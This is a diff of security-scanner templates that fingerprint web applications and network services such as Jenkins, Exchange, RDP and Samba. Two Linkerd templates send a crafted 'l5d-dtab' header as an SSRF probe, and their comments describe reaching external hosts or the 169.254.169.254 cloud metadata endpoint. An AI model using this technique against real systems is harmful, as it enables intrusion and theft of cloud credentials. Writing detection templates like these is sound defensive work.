"{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: - - type: word part: body words: @@ -22,3 +23,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100ac246777d3718dd9efcf600fe5399d8797588671770c404df1c8e88b890ebaf502205d3da929451c8d172b413e80495ea002d461934768ea56cc79938db40953e21a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/gitlab-detect.yaml b/poc/detect/gitlab-detect.yaml index 6231806660..816fcf390d 100644 --- a/poc/detect/gitlab-detect.yaml +++ b/poc/detect/gitlab-detect.yaml @@ -1,8 +1,10 @@ id: Gitlab-Detect + info: name: Detect Gitlab author: ehsahil severity: info + requests: - method: GET path: diff --git a/poc/detect/grafana-detect.yaml b/poc/detect/grafana-detect.yaml index f50d3e0abe..4f87f7ee36 100644 --- a/poc/detect/grafana-detect.yaml +++ b/poc/detect/grafana-detect.yaml @@ -4,7 +4,6 @@ info: name: Grafana panel detect author: organiccrap severity: info - tags: panel requests: - method: GET @@ -15,9 +14,3 @@ requests: words: - "Grafana" part: body - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Grafana ([v0-9.]+)' diff --git a/poc/detect/graphql-detect.yaml b/poc/detect/graphql-detect.yaml index 1794593fe9..399e476c60 100644 --- a/poc/detect/graphql-detect.yaml +++ b/poc/detect/graphql-detect.yaml @@ -2,7 +2,7 @@ id: graphql-detect info: name: GraphQL API Detection - author: NkxxkN & ELSFA7110 + author: NkxxkN,ELSFA7110 severity: info requests: @@ -30,8 +30,6 @@ requests: - "{{BaseURL}}/graphql-devtools" - "{{BaseURL}}/graphql/v1" - "{{BaseURL}}/v1/graphql" - - "{{BaseURL}}/lol/graphql" - - "{{BaseURL}}/lol/graphql/v1" - "{{BaseURL}}/api/graphql/v1" - "{{BaseURL}}/portal-graphql" - "{{BaseURL}}/graphql-playground" diff --git a/poc/detect/grav-cms-detect-7842.yaml b/poc/detect/grav-cms-detect-7842.yaml index 168a866015..d9f2c5bde4 100644 --- a/poc/detect/grav-cms-detect-7842.yaml +++ b/poc/detect/grav-cms-detect-7842.yaml @@ -5,17 +5,19 @@ info: author: cyllective severity: info description: Detects Grav CMS + reference: + - https://github.com/getgrav/grav + metadata: + max-request: 1 tags: tech,grav,cms - reference: https://github.com/getgrav/grav -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: or matchers: - - type: word part: header words: @@ -24,4 +26,6 @@ requests: - type: word part: body words: - - '' \ No newline at end of file + - '' + +# digest: 4a0a004730450220700f01b8d8cc3f19f9e349fa7d8bc87eb4b0f09ecad8c8f1e37be766e7453cfd022100f4b5bb3e4a84e6ed6b6c28794c87106d3438c342b846f96d096abb9bc3ad60c4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/gunicorn-detect.yaml b/poc/detect/gunicorn-detect.yaml index 420f1af650..0c162e4c4e 100644 --- a/poc/detect/gunicorn-detect.yaml +++ b/poc/detect/gunicorn-detect.yaml @@ -1,22 +1,26 @@ id: gunicorn-detect + info: name: Detect Gunicorn Server author: joanbono - severity: info description: Gunicorn Python WSGI HTTP Server for UNIX - reference: - - https://github.com/benoitc/gunicorn + reference: https://github.com/benoitc/gunicorn + severity: info tags: tech,gunicorn + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: regex part: header regex: - gunicorn+ + extractors: - type: kval part: header diff --git a/poc/detect/itop-detect.yaml b/poc/detect/itop-detect.yaml index daf68e81e2..da91475e93 100644 --- a/poc/detect/itop-detect.yaml +++ b/poc/detect/itop-detect.yaml @@ -1,24 +1,19 @@ id: itop-detect - info: name: iTop Detect author: pikpikcu severity: info tags: tech,itop - requests: - method: GET path: - "{{BaseURL}}/pages/UI.php" - matchers-condition: and matchers: - - type: word part: body words: - "iTop login" - - type: status status: - 200 diff --git a/poc/detect/jaspersoft-detect.yaml b/poc/detect/jaspersoft-detect.yaml index 095c58200f..e38d04792c 100644 --- a/poc/detect/jaspersoft-detect.yaml +++ b/poc/detect/jaspersoft-detect.yaml @@ -3,6 +3,7 @@ info: name: Jaspersoft detected author: koti2 severity: info + tags: tech,jaspersoft requests: - method: GET path: diff --git a/poc/detect/jboss-detect.yaml b/poc/detect/jboss-detect.yaml index 5cfb12fe1d..d70d98fc0e 100644 --- a/poc/detect/jboss-detect.yaml +++ b/poc/detect/jboss-detect.yaml @@ -1,30 +1,22 @@ id: jboss-detect - info: name: JBoss detected - author: daffainfo,idealphase + author: daffainfo severity: info tags: tech,jboss - requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word part: body words: + - "Welcome to JBoss AS" + - "Welcome to JBoss Application Server" - "JBoss EAP 7" - - - type: regex - part: body - regex: - - '<title>Welcome to JBoss(.*)' - - extractors: - - type: regex - group: 1 - part: body - regex: - - '

Welcome to (.+)<\/h1>' + condition: or + - type: status + status: + - 200 diff --git a/poc/detect/jeedom-detect.yaml b/poc/detect/jeedom-detect.yaml index 4154e6b7d0..b7c3ef8645 100644 --- a/poc/detect/jeedom-detect.yaml +++ b/poc/detect/jeedom-detect.yaml @@ -1,24 +1,19 @@ id: jeedom-detect - info: name: Jeedom Detect author: pikpikcu severity: info tags: tech,jeedom - requests: - method: GET path: - "{{BaseURL}}/index.php?v=d" - matchers-condition: and matchers: - - type: word part: body words: - "Jeedom" - - type: status status: - 200 diff --git a/poc/detect/jenkins-detect.yaml b/poc/detect/jenkins-detect.yaml index 136d39862b..2991584dd5 100644 --- a/poc/detect/jenkins-detect.yaml +++ b/poc/detect/jenkins-detect.yaml @@ -1,5 +1,4 @@ id: jenkins-detect - info: name: Jenkins Detection author: philippdelteil,daffainfo,c-sh0 @@ -11,13 +10,11 @@ info: metadata: shodan-query: http.favicon.hash:81586312 tags: tech,jenkins - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/whoAmI/" - redirects: true max-redirects: 2 stop-at-first-match: true @@ -28,11 +25,9 @@ requests: words: - "x-jenkins" case-insensitive: true - - type: word words: - "Jenkins" - extractors: - type: kval kval: diff --git a/poc/detect/kevinlab-device-detect-8461.yaml b/poc/detect/kevinlab-device-detect-8461.yaml index 6d56bb0b3c..d1b70a5e53 100644 --- a/poc/detect/kevinlab-device-detect-8461.yaml +++ b/poc/detect/kevinlab-device-detect-8461.yaml @@ -1,15 +1,18 @@ id: kevinlab-device-detect + info: name: KevinLAB Devices Detection + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. author: gy741 severity: info - description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. tags: iot,kevinlab + requests: - method: GET path: - "{{BaseURL}}/pages/" - "{{BaseURL}}/dashboard/" + matchers-condition: or matchers: - type: word @@ -18,6 +21,7 @@ requests: - '../http/index.php' part: body condition: and + - type: word words: - 'HEMS' diff --git a/poc/detect/linkerd-service-detect-8634.yaml b/poc/detect/linkerd-service-detect-8634.yaml index 068fd47928..bca4269724 100644 --- a/poc/detect/linkerd-service-detect-8634.yaml +++ b/poc/detect/linkerd-service-detect-8634.yaml @@ -1,17 +1,23 @@ id: linkerd-service-detect + info: name: Linkerd Service detection author: dudez severity: info - reference: - - https://twitter.com/nirvana_msu/status/1084144955034165248 - tags: tech,linkerd,service + tags: tech,linkerd + reference: https://twitter.com/nirvana_msu/status/1084144955034165248 + + requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - l5d-dtab: /svc/* => /$/inet/interact.sh/443 + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + l5d-dtab: /svc/* => /$/inet/example.com/443 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + matchers-condition: or matchers: - type: regex @@ -21,9 +27,10 @@ requests: - '(?mi)^Via\s*?:.*?linkerd.*$' part: header condition: or + - type: regex regex: - '(?mi)Exceeded .*? binding timeout while resolving name' - '(?mi)exceeded .*? to unspecified while dyn binding' part: body - condition: or + condition: or \ No newline at end of file diff --git a/poc/detect/linkerd-ssrf-detect.yaml b/poc/detect/linkerd-ssrf-detect.yaml index ad99f869a7..16b0eb2d0f 100644 --- a/poc/detect/linkerd-ssrf-detect.yaml +++ b/poc/detect/linkerd-ssrf-detect.yaml @@ -1,5 +1,4 @@ id: linkerd-ssrf-detect - # Detect the Linkerd service by overriding the delegation table and # inspect the response for: # - a "Via: .. linkerd .." @@ -14,19 +13,16 @@ id: linkerd-ssrf-detect # # - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts # - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata - info: name: Linkerd SSRF detection author: dudez severity: info - requests: - method: GET path: - "{{BaseURL}}/" headers: l5d-dtab: /svc/* => /$/inet/example.com/443 - matchers-condition: or matchers: - type: regex @@ -34,31 +30,26 @@ requests: regex: - '(?mi)^Via\s*?:.*?linkerd.*$' part: header - - type: regex name: l5d-err-present regex: - '(?mi)^l5d-err:.*$' part: header - - type: regex name: l5d-success-class-present regex: - '(?mi)^l5d-success-class: 0.*$' part: header - - type: word name: ssrf-response-body words: - '

This domain is for use in illustrative examples in documents.' part: body - - type: regex name: resolve-timeout-error-present regex: - '(?mi)Exceeded .*? binding timeout while resolving name' part: body - - type: regex name: dynbind-error-present regex: diff --git a/poc/detect/lucee-detect-8661.yaml b/poc/detect/lucee-detect-8661.yaml index c6751e5e62..773582565f 100644 --- a/poc/detect/lucee-detect-8661.yaml +++ b/poc/detect/lucee-detect-8661.yaml @@ -1,15 +1,24 @@ id: lucee-detect + info: name: Detect Lucee - author: geeknik - description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ + author: geeknik,DhiyaneshDK severity: info + description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ + metadata: + max-request: 2 + shodan-query: "html:\"Lucee\"" + fofa-query: "app=\"Lucee-Engine\"" tags: tech,lucee -requests: + +http: - method: GET path: + - "{{BaseURL}}/lucee/doc/functions.cfm" - "{{BaseURL}}" - matchers-condition: and + + stop-at-first-match: true + matchers-condition: or matchers: - type: regex part: header @@ -18,6 +27,9 @@ requests: - "(?i)X-CB-Server: LUCEE" - "(?i)X-IDG-Appserver: Lucee" condition: or - - type: status - status: - - 200 + + - type: word + part: body + words: + - "Lucee Function Reference" +# digest: 4a0a00473045022075f26792907c6d74be5f38bbe41be081199595519e306502ecd4bdfee409f2f7022100b02b3b2ac7b94271edb6835e15e0b302f6270605125e9312412d075effba137d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/lucee-detect.yaml b/poc/detect/lucee-detect.yaml index c6751e5e62..e4cd2663f7 100644 --- a/poc/detect/lucee-detect.yaml +++ b/poc/detect/lucee-detect.yaml @@ -4,13 +4,14 @@ info: author: geeknik description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ severity: info - tags: tech,lucee + requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and + matchers: + - type: regex part: header regex: @@ -18,6 +19,3 @@ requests: - "(?i)X-CB-Server: LUCEE" - "(?i)X-IDG-Appserver: Lucee" condition: or - - type: status - status: - - 200 diff --git a/poc/detect/magmi-detect.yaml b/poc/detect/magmi-detect.yaml index a18b5b4ae5..b78bd29310 100644 --- a/poc/detect/magmi-detect.yaml +++ b/poc/detect/magmi-detect.yaml @@ -3,7 +3,7 @@ info: name: MAGMI (Magento Mass Importer) Plugin Detect author: dwisiswant0 severity: info - tags: magento,magmi + tags: magento,magmi,plugin requests: - method: GET path: diff --git a/poc/detect/microsoft-echange-server-detect.yaml b/poc/detect/microsoft-echange-server-detect.yaml index a07f331300..10eacbc4b1 100644 --- a/poc/detect/microsoft-echange-server-detect.yaml +++ b/poc/detect/microsoft-echange-server-detect.yaml @@ -1,5 +1,4 @@ id: microsoft-exchange-server-detect - info: name: Microsoft Exchange Server Detect author: pikpikcu,dhiyaneshDK @@ -7,25 +6,20 @@ info: reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data. tags: microsoft,exchange,tech - requests: - method: GET path: - "{{BaseURL}}/owa/auth/logon.aspx" - matchers-condition: or matchers: - - type: regex regex: - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" part: all - - type: word words: - 'Exchange Log In' - 'Microsoft Exchange - Outlook Web Access' - extractors: - type: kval kval: diff --git a/poc/detect/moinmoin-detect-8917.yaml b/poc/detect/moinmoin-detect-8917.yaml index 9edb739dd7..948f4cd509 100644 --- a/poc/detect/moinmoin-detect-8917.yaml +++ b/poc/detect/moinmoin-detect-8917.yaml @@ -1,5 +1,4 @@ id: moinmoin-detect - info: name: MoinMoin wiki detect author: cyllective @@ -7,15 +6,11 @@ info: description: Detects MoinMoin Wiki reference: - https://github.com/moinwiki/moin-1.9 - metadata: - max-request: 1 tags: tech,moin,moinmoin,wiki - -http: +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word @@ -24,16 +19,12 @@ http: words: - 'MoinMoin Powered' - 'Python Powered' - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - '\/moin_static(\w+)\/' - -# digest: 4a0a00473045022020464642125d41dfbeb5f6e8a10bf68a20e324c5f20f07d48ad9209d75ea0cad022100cf508e9ed48c5986a1157850375f0bb50610bfb7cb91d265756cf22522670523:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/mrtg-detect-8958.yaml b/poc/detect/mrtg-detect-8958.yaml index ebc3139904..fe48bb2308 100644 --- a/poc/detect/mrtg-detect-8958.yaml +++ b/poc/detect/mrtg-detect-8958.yaml @@ -1,23 +1,36 @@ id: mrtg-detect + info: name: Detect MRTG author: geeknik - description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info -requests: + description: The Multi Router Traffic Grapher + reference: + - https://oss.oetiker.ch/mrtg/ + metadata: + max-request: 3 + tags: tech,mrtg + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/mrtg/" - "{{BaseURL}}/MRTG/" + + stop-at-first-match: true + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - "MRTG Index Page" - "Multi Router Traffic Grapher" condition: and + +# digest: 490a0046304402202c89cdfa5c15dc928a0cb84f44ab05f5c5a0fbc8b8d2bd14a61a09f9a276ad3202206577f6bd0dca4b7a830874a22a5053ecf8d54fbbdc2674c49c43d99b5fbb1837:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/mrtg-detect.yaml b/poc/detect/mrtg-detect.yaml index ebc3139904..19a062f6fa 100644 --- a/poc/detect/mrtg-detect.yaml +++ b/poc/detect/mrtg-detect.yaml @@ -4,12 +4,14 @@ info: author: geeknik description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info + requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/mrtg/" - "{{BaseURL}}/MRTG/" + matchers-condition: and matchers: - type: status diff --git a/poc/detect/neos-detect.yaml b/poc/detect/neos-detect.yaml index 793d2f1421..754415fda3 100644 --- a/poc/detect/neos-detect.yaml +++ b/poc/detect/neos-detect.yaml @@ -2,12 +2,9 @@ id: neos-detect info: name: Neos CMS detection author: k11h-de + description: some Neos websites remove the X-Flow-Powered Header, but they usually all have a comment line at the top of the body severity: info - description: Neos CMS was detected. - reference: - - https://github.com/neos/ - classification: - cwe-id: CWE-200 + reference: https://github.com/neos/ tags: tech,neos,cms requests: - method: GET @@ -23,5 +20,3 @@ requests: - type: kval kval: - 'x_flow_powered' - -# Enhanced by mp on 2022/04/01 diff --git a/poc/detect/nexus-detect.yaml b/poc/detect/nexus-detect.yaml index c14e18f275..e8b8d0e84b 100644 --- a/poc/detect/nexus-detect.yaml +++ b/poc/detect/nexus-detect.yaml @@ -1,19 +1,23 @@ -id: nexus-detect -info: - name: Nexus Repository Manager (NRM) Instance Detection Template - author: righettod - severity: info - description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor - tags: tech,nexus -requests: - - method: GET - path: - - "{{BaseURL}}/service/rest/swagger.json" - matchers-condition: and - matchers: - - type: word - words: - - "Nexus Repository Manager" - - type: status - status: - - 200 +id: nexus-detect + +info: + name: Nexus Repository Manager (NRM) Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor + tags: tech,nexus + +requests: + - method: GET + path: + - "{{BaseURL}}/service/rest/swagger.json" + + matchers-condition: and + matchers: + - type: word + words: + - "Nexus Repository Manager" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/detect/oauth2-detect.yaml b/poc/detect/oauth2-detect.yaml index 53cc1456fe..fd9066a622 100644 --- a/poc/detect/oauth2-detect.yaml +++ b/poc/detect/oauth2-detect.yaml @@ -1,28 +1,28 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - tags: tech,oauth - -requests: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: +id: oauth2-detect + +info: + name: OAuth 2.0 Authorization Server Detection Template + author: righettod + severity: info + description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint + tags: tech,oauth + +requests: + - method: POST + path: + - "{{BaseURL}}/oauth/token" + + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + + matchers-condition: and + matchers: + - type: status + status: + - 401 + - 400 + condition: or + + - type: word + part: body + words: - 'error":"invalid_client"' \ No newline at end of file diff --git a/poc/detect/octobercms-detect-9196.yaml b/poc/detect/octobercms-detect-9196.yaml index 6a51fee4d3..341fa66503 100644 --- a/poc/detect/octobercms-detect-9196.yaml +++ b/poc/detect/octobercms-detect-9196.yaml @@ -1,4 +1,5 @@ id: octobercms-detect + info: name: OctoberCMS detect author: cyllective @@ -6,21 +7,28 @@ info: description: Detects OctoberCMS reference: - https://github.com/octobercms/october + metadata: + max-request: 2 tags: tech,octobercms -requests: + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/modules/system/assets/js/framework.combined-min.js" + stop-at-first-match: true - redirects: true + host-redirects: true max-redirects: 1 matchers: - type: word part: header words: - 'october_session' + - type: word part: body words: - 'OctoberCMS' + +# digest: 4a0a0047304502205f8da2c9d61947da70d15737e9d29ed649cd7a28e03643c76710a92c8cf6371d022100b05d06ccfab06cd9c0a2c55862b8a29c5d0db2b9fe168b637ea926fc476f6384:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/oipm-detect-9219.yaml b/poc/detect/oipm-detect-9219.yaml index 2350460752..8130790a6a 100644 --- a/poc/detect/oipm-detect-9219.yaml +++ b/poc/detect/oipm-detect-9219.yaml @@ -1,16 +1,9 @@ id: oipm-detect info: - name: One Identity Password Manager Detection - description: One Identity Password Manager is a secure password manager that gives enterprises control over password management, policies, and automated reset functions. + name: One Identity Password Manager detection author: nodauf severity: info tags: panel - remediation: Ensure proper access. - reference: https://www.oneidentity.com/techbrief/security-guide-for-password-manager821177/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 requests: - method: GET path: @@ -19,5 +12,3 @@ requests: - type: word words: - "One Identity Password Manager" - -# Enhanced by mp on 2022/02/10 diff --git a/poc/detect/openx-detect.yaml b/poc/detect/openx-detect.yaml index 9d76d1fab6..0d1a1418f2 100644 --- a/poc/detect/openx-detect.yaml +++ b/poc/detect/openx-detect.yaml @@ -1,30 +1,27 @@ id: openx-detect - info: name: OpenX detect author: pikpikcu severity: info tags: tech,openx - requests: - method: GET path: - - "{{BaseURL}}/www/admin/" - + - "{{BaseURL}}/www/admin/index.php" + - "{{BaseURL}}/admin/index.php" + stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body regex: - 'OpenX' - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - - 'content="(.*)- http://www.openx.org">' + - '(.*)- http://www.openx.org' diff --git a/poc/detect/php-proxy-detect-9544.yaml b/poc/detect/php-proxy-detect-9544.yaml index 16d49d2f3b..3978ef9413 100644 --- a/poc/detect/php-proxy-detect-9544.yaml +++ b/poc/detect/php-proxy-detect-9544.yaml @@ -1,26 +1,35 @@ id: php-proxy-detect + info: name: PHP Proxy Detect author: pikpikcu severity: info + metadata: + max-request: 2 tags: tech,php,proxy -requests: + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/proxy" + matchers-condition: and matchers: - type: word part: body words: - "PHP-Proxy" + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - '' + +# digest: 490a0046304402207b3bef18d95acf42b957d883ee45f5b8190c3e65ec36d4396fc711b1475d80d8022047ca111f8d9b193176ee4cdfa87cba20bfc0236f15921cd92606afa3d93191e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/pi-hole-detect-9581.yaml b/poc/detect/pi-hole-detect-9581.yaml index 246c2319aa..4240a1feaf 100644 --- a/poc/detect/pi-hole-detect-9581.yaml +++ b/poc/detect/pi-hole-detect-9581.yaml @@ -3,6 +3,7 @@ info: name: pi-hole detector author: geeknik severity: info + tags: tech,pihole requests: - method: GET path: diff --git a/poc/detect/prometheus-exporter-detect-9676.yaml b/poc/detect/prometheus-exporter-detect-9676.yaml index c581c3448c..e0f4bf47fe 100644 --- a/poc/detect/prometheus-exporter-detect-9676.yaml +++ b/poc/detect/prometheus-exporter-detect-9676.yaml @@ -10,8 +10,6 @@ requests: - method: GET path: - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/detect/prtg-detect.yaml b/poc/detect/prtg-detect.yaml index c57d90484d..e24606ba47 100644 --- a/poc/detect/prtg-detect.yaml +++ b/poc/detect/prtg-detect.yaml @@ -4,14 +4,12 @@ info: author: geeknik description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info - requests: - method: GET path: - "{{BaseURL}}/index.htm" - "{{BaseURL}}/prtg/index.htm" - "{{BaseURL}}/PRTG/index.htm" - matchers-condition: and matchers: - type: status @@ -22,12 +20,10 @@ requests: words: - "PRTG Network Monitor" condition: and - - type: regex part: header regex: - PRTG - extractors: - type: kval part: header diff --git a/poc/detect/puppetserver-detect-9723.yaml b/poc/detect/puppetserver-detect-9723.yaml index 8b9e32851b..83c9bcabdf 100644 --- a/poc/detect/puppetserver-detect-9723.yaml +++ b/poc/detect/puppetserver-detect-9723.yaml @@ -1,29 +1,40 @@ id: puppetserver-detect + info: name: Puppetserver Detection author: c-sh0 severity: info - reference: https://insinuator.net/2020/09/puppet-assessment-techniques/ - tags: tech,puppet,exposure -requests: + reference: + - https://insinuator.net/2020/09/puppet-assessment-techniques/ + metadata: + max-request: 1 + tags: tech,puppet,exposure,intrusive + +http: - method: GET path: - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" + matchers-condition: and matchers: - type: status status: - 404 + - type: word part: header words: - "x-puppet-version" case-insensitive: true + - type: word part: body words: - "{{randstr}}" + extractors: - type: kval kval: - x_puppet_version + +# digest: 4b0a004830460221009da8fdf7d343803bb76c86b36935e485784f03258b9285ef838fe1bddacf115e02210080939b191b4e6ebd534a1d86ad859bd1cf566f2493f8bf5aa4c26768786edf80:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/ranger-detection-9830.yaml b/poc/detect/ranger-detection-9830.yaml index d299f2c75d..9ee92b5956 100644 --- a/poc/detect/ranger-detection-9830.yaml +++ b/poc/detect/ranger-detection-9830.yaml @@ -1,29 +1,25 @@ -id: ranger-detection - -info: - name: Apache Ranger Detection - author: For3stCo1d - severity: info - tags: tech,apache,ranger - metadata: - shodan-query: http.title:"Ranger - Sign In" - reference: https://github.com/apache/ranger - -requests: - - method: GET - path: - - '{{BaseURL}}/login.jsp' - - "{{BaseURL}}/images/favicon.ico" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - " Ranger - Sign In" - - - type: dsl - name: favicon - dsl: - - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))" +id: ranger-detection +info: + name: Apache Ranger Detection + author: For3stCo1d + severity: info + tags: tech,apache,ranger + metadata: + shodan-query: http.title:"Ranger - Sign In" + reference: https://github.com/apache/ranger +requests: + - method: GET + path: + - '{{BaseURL}}/login.jsp' + - "{{BaseURL}}/images/favicon.ico" + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - " Ranger - Sign In" + - type: dsl + name: favicon + dsl: + - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))" diff --git a/poc/detect/rdp-detect-9840.yaml b/poc/detect/rdp-detect-9840.yaml index ebe93db4f3..051db6c51d 100644 --- a/poc/detect/rdp-detect-9840.yaml +++ b/poc/detect/rdp-detect-9840.yaml @@ -1,25 +1,22 @@ id: rdp-detect + info: name: Windows RDP Detection author: princechaddha severity: info - metadata: - verified: true - tags: network,windows,rdp + tags: windows,rdp,network + network: - inputs: - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" type: hex read-size: 2048 + host: - - "{{Host}}:3389" - "{{Hostname}}" + - "{{Host}}:3389" + matchers: - - type: word - name: rdp - encoding: hex - words: - - "030000130ed" - type: word encoding: hex name: win2000 @@ -55,11 +52,6 @@ network: name: win2012R2OR8 words: - "030000130ed00000123400020f080002000000" - - type: word - encoding: hex - name: win2012R2 - words: - - "030000130ed00000123400020f080008000000" - type: word encoding: hex name: win2016 diff --git a/poc/detect/redcap-detector-9850.yaml b/poc/detect/redcap-detector-9850.yaml index a3619bb47c..92d8687e1b 100644 --- a/poc/detect/redcap-detector-9850.yaml +++ b/poc/detect/redcap-detector-9850.yaml @@ -1,16 +1,13 @@ id: redcap-detector - info: name: REDCap detector author: philippedelteil,retr0 severity: info tags: redcap,tech - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word @@ -18,11 +15,9 @@ requests: - 'REDCap' - 'Vanderbilt University' condition: and - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/detect/redmine-cli-detect-9854.yaml b/poc/detect/redmine-cli-detect-9854.yaml index ba7f5a1b5b..fcd31af4f4 100644 --- a/poc/detect/redmine-cli-detect-9854.yaml +++ b/poc/detect/redmine-cli-detect-9854.yaml @@ -14,9 +14,9 @@ requests: - type: word part: body words: - - "default" - - "my_id" - - "root_url" + - default + - my_id + - root_url condition: and - type: status status: diff --git a/poc/detect/rhymix-cms-detect.yaml b/poc/detect/rhymix-cms-detect.yaml index 6314a0e45f..2e2299fb4f 100644 --- a/poc/detect/rhymix-cms-detect.yaml +++ b/poc/detect/rhymix-cms-detect.yaml @@ -1,22 +1,26 @@ id: rhymix-cms-detect + info: name: Rhymix CMS Detect author: gy741 severity: info description: Detects Rhymix CMS - reference: - - https://github.com/rhymix/rhymix tags: tech,rhymix + reference: https://github.com/rhymix/rhymix + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: or matchers: + - type: word part: header words: - 'rx_sesskey1' + - type: word part: body words: diff --git a/poc/detect/samba-detect-9988.yaml b/poc/detect/samba-detect-9988.yaml index 1bd21fd9d7..433010b743 100644 --- a/poc/detect/samba-detect-9988.yaml +++ b/poc/detect/samba-detect-9988.yaml @@ -1,15 +1,8 @@ id: samba-detection info: - name: Samba Detection + name: samba detection author: pussycat0x severity: info - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. - reference: - - https://www.samba.org/samba/what_is_samba.html - - https://www.samba.org/samba/history/security.html - classification: - cwe-id: CWE-200 - remediation: Always apply the latest security patch. tags: network,smb,samba network: - inputs: @@ -22,4 +15,3 @@ network: - type: word words: - "SMBr" -# Enhanced by mp on 2022/02/09 diff --git a/poc/detect/sap-netweaver-detect-10044.yaml b/poc/detect/sap-netweaver-detect-10044.yaml index edbd2eaef5..9fe826a6f5 100644 --- a/poc/detect/sap-netweaver-detect-10044.yaml +++ b/poc/detect/sap-netweaver-detect-10044.yaml @@ -1,14 +1,17 @@ id: sap-netweaver-detect + info: name: SAP NetWeaver ICM Detection author: randomstr1ng - severity: info description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) + severity: info tags: sap,webserver + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers: @@ -19,6 +22,7 @@ requests: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + extractors: - type: kval part: header diff --git a/poc/detect/secmail-detect.yaml b/poc/detect/secmail-detect.yaml index 71b8405b65..45536712b0 100644 --- a/poc/detect/secmail-detect.yaml +++ b/poc/detect/secmail-detect.yaml @@ -3,7 +3,8 @@ info: name: SecMail - secure email Detect author: johnk3r severity: info - reference: https://www.shodan.io/search?query=secmail + reference: + - https://www.shodan.io/search?query=secmail tags: secmail,panel 